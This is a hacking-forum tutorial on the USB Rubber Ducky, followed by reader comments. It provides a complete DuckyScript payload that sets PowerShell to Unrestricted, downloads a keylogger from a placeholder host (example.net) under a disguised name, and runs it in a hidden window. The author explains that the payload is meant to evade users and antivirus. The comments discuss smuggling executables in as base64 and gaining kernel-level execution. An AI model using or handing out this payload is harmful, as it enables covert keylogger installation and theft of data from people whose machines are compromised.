Plug In To Win - DuckyScript [Part 1/3]

Hey Mates!

This time I have a project of mine to share with you about the USB Rubber Ducky. Maybe some of you already heard of it, e.g. @Occupytheweb wrote an article about its use in Mr. Robot.

At the end of this small series you should be able to write your own Scripts for hacking the box just with an USB Stick and without the need of knowledge of any programming language!

---

Structure

Part 1: How to use DuckyScript for writing a FUD file downloader & executor
Part 2: How to use Powershell (Microsofts new shell; reminds of the linux terminal) for writing a FUD KeyLogger [Bonus]
Part 3: How to build your own BadUSB for around 10$

---

USB Rubber Ducky

[quote]“If it quacks like a keyboard and types like a keyboard, it must be a keyboard.”
~ Rubber Ducky Wiki[/quote]
This little quote tells us the main idea behind Bad USB. It’s a technique to convince the computer that we are not a USB Stick (Which can’t execute things on his own), but a completly normal and unsuspicious keyboard, controlled by the user. This is useful, because keyboards have the right to type (Wow, big surprise ).

[quote]“Humans use keyboards, and computers trust humans.”
~ Rubber Ducky Wiki[/quote]
The computer thinks we’re a normal user, who just wants to download a file via powershell. That’s not something disallowed, so it goes pretty unnoticed. If any warnings pop up, like “Don’t trust files from the internet”, we just press Enter and skip’em, because the keyboard rules!

Do I need the Rubber Ducky?

I recommend using a Rubber Ducky for the following stuff, but it’s not required. In the third part I’ll explain how to build your own Bad USB for about 10$! Anyway, this one will be much harder to reprogram and to work with, so I highly recommend you to buy a Rubbber Ducky, when you are hooked .

You can get it for 44.99$ at Hak5hop. The decision is yours .

---

DuckyScript - Introduction

Now we’ve got an USB Stick with a personality disorder, which thinks it’s a keyboard, but how does it know what it has to do on the target system? The answer is a script language, called DuckyScript. It’s syntax is pretty straightforward, it’s requirements are nearly not existent and the needed intelligence is just ridiculous .

Requirements

• Any text editor
• Duckencoder

Text Editor

I think you’ll find one… gedit, Windows editor, vim, etc…

Duckencoder

The default Duckencoder.jar can be found at github. However, I’ve had some problems due to different keyboard layouts and searched for an alternative, so I stumbled upon this thread. There you can download a custom version of the Duckencoder, which supports different keyboard layouts.

DuckyScript - Our Script

I’ll cover just the basics and not all the keys you can use, because they can be already found here.

Basics

• You have to write every command on a new line
• Don’t use blank lines (Never read it, but they seemed to break my script )
• Use REM for comments
• Use STRING for typing normal letters (It presses automatically shift, when you use upper-case letters and symbols like !"§$)
• Use GUI for pressing the Windos key
• Use ENTER for pressing ENTER (Wow, that’s insane)
• Use DELAY for waiting between new commands

That’s all, what I’ve needed for writing my downloader & executor script!

Example Powershell Script Downloader & Executor

REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING J
ENTER
DELAY 300

First we set the Powershell ExecutionPolicy Setting to Unrestricted, so that our script can be executed on the target system. Maybe you’ve noticed that we just change the CurrentUsers setting. This requires no special privileges and works as good as changing the whole machines settings.

REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300

Next we’re downloading the Powershell Script. This one uses the .Net WebClient, which can be called from within Powershell (During my little journey through Keyloggers I’ve found Powershell just awesome; I highly recommend everyone to have a look at it. Maybe I’ll make some basic tutorials about it in the future ). The command Downloads the file from the given Web-site, where you’ve put the script (http://example.net/keylogger.ps1) and saves them under the given directory (As an example I use the current directory (Users directory) and the name “WinSys32.ps1”). Then we leave the Powershell console.

REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER

Finally we run the Script as a background powershell process. This has two big advantages:

• The user can’t spot it easily
• It runs under the name “Windows Powershell” with the default Powershell Icon. No user will think his own windows spys on him . (Oh, and AVs don’t care either; more on that in the next part)

Full Script

Here’s the full script, so that you don’t have to put the pieces together .

REM Download & Execute Powershell Script
REM ~ TheDoctor v1.3.3.7
REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING J
ENTER
DELAY 300
REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300
REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER

How To Put That Script On Your Bad USB?

With the USB Rubber Ducky it’s very easy. Just take the Micro-SD card, put it in a Micro-SD to SD adapter and plug it in your computer. Then build the script with the Duckencoder:

Or when you want to compile with a specified keyboard layout (Only possible with the modified Duckencoder)

Where
-i is the input file
-o is the output file
-l is the keyboard layout (Check the link to the thread for all possible layouts)

Now copy the inject.bin (No other name is allowed! The script has to be named inject.bin) to the Micro-SD card and plug it back into your Rubber Ducky. Finished.

With Bad USB it’s much more complicated, so I’ll explain it in the third part of the series.

---

Payload Collection

You can find many different DuckyScripts here. It’s a good place to search for some techniques you can use, when writing your own scripts (Or to find scripts for trolling your friends, e.g. this one ). There are some very interesting ones like mimikatz, utilman exploit or a WIFI password grabber.

---

Conclusion

Is it really that easy? Yes. Just write your own simple DuckyScript, plug in your Bad USB and… It’s won . Oh, and don’t forget that you feel like a real 1337 h4xx0r, when you just have to put in your Stick and see magically popping up windows, filling with commands without anyones interaction .

In the next part we’ll talk about the Powershell Script, you have to download. Don’t expect a big introduction to Powershell, because I’m just a beginner, but I’m looking forward to explain you some basics.

|-TheDoctor-|

MATE! This is soooooo good. I love it. I seriously should consider getting one… I think when I save some money up it’ll be on my list

Keep up the AWESOME work!

Great Work! Can you also cover how to interact with executables stored on the internal sd card in the next tutorials?

I thought about it too, but it seems there’s no way to use any files on the SD card. The Rubber Ducky emulates perfectly a normal keyboard and as such it can’t exchange data with the computer from it’s storage. I had two ideas to circumvent that:

• Write executables byte data hardcoded into the script (An example of that technique can be found here)
• Write custom firmware, which runs .exe named ‘inject.exe’ from your SD card (Just an idea; probably it doesn’t work, because Windows forbids it? I think this would have been already implemented, when it could work . Maybe some of the C guys here want to have a look at the Rubber Duckys firmware and the ability of running arbitrary code? It could be read from the .exe on the SD card (Which seems to work; else DuckyScript shouldn’t work either) and run the given code in the keyboard drivers memory, isn’t it? You see, I’m just speculating . I hope more experienced low-levels can answer this questions )

Anyway, that would be awesome, if you could run any .exe without having to worry about downloads. And when it could be run in the drivers memory, it should have ring0 rights, which would be another benefit .

And @pry0cc Christmas is near (At least almost near ). Maybe you can get one then .

I have an idea. You could base64 encrypt an executable; have it type it out and save it; then base64 decrypt.

Yep, that’s the basic idea behind the link . I think you wouldn’t even need the script he uses, just some powershell magic (As I said, I begin to love Powershell ).

Don’t know much about the rubber ducky (planning to get one ), but did you have a look here?

Yep, but that one is for identifying another plugged in USB Stick with the name ‘DUCKY’, where it then looks for a specific .exe, which is then executed . If you’re interested in it, I can write about it, but it require you to put in two Sticks (The Bad USB & The Stick with the .exe).

Nope, that’s not really what I wanted Just a question: After the DuckyScript has been executed, can the device be used to store data?

I’ve found this one . If I’m right this custom firmware is even able to be used as Mass Storage and Keyboard… Maybe I can find some further information on that .

Looks nice! I also found TwinDuck, which seems to do similar things (but there are some problems with it as some people write on the internet). Are you on the IRC?

Sorry, went off early yesterday, because I had to write an application for a work experience . I’ll have a look at both of them and try to figure out how it works . Maybe it’ll get a place as the fourth part?

Would be great!

This topic was automatically closed after 30 days. New replies are no longer allowed.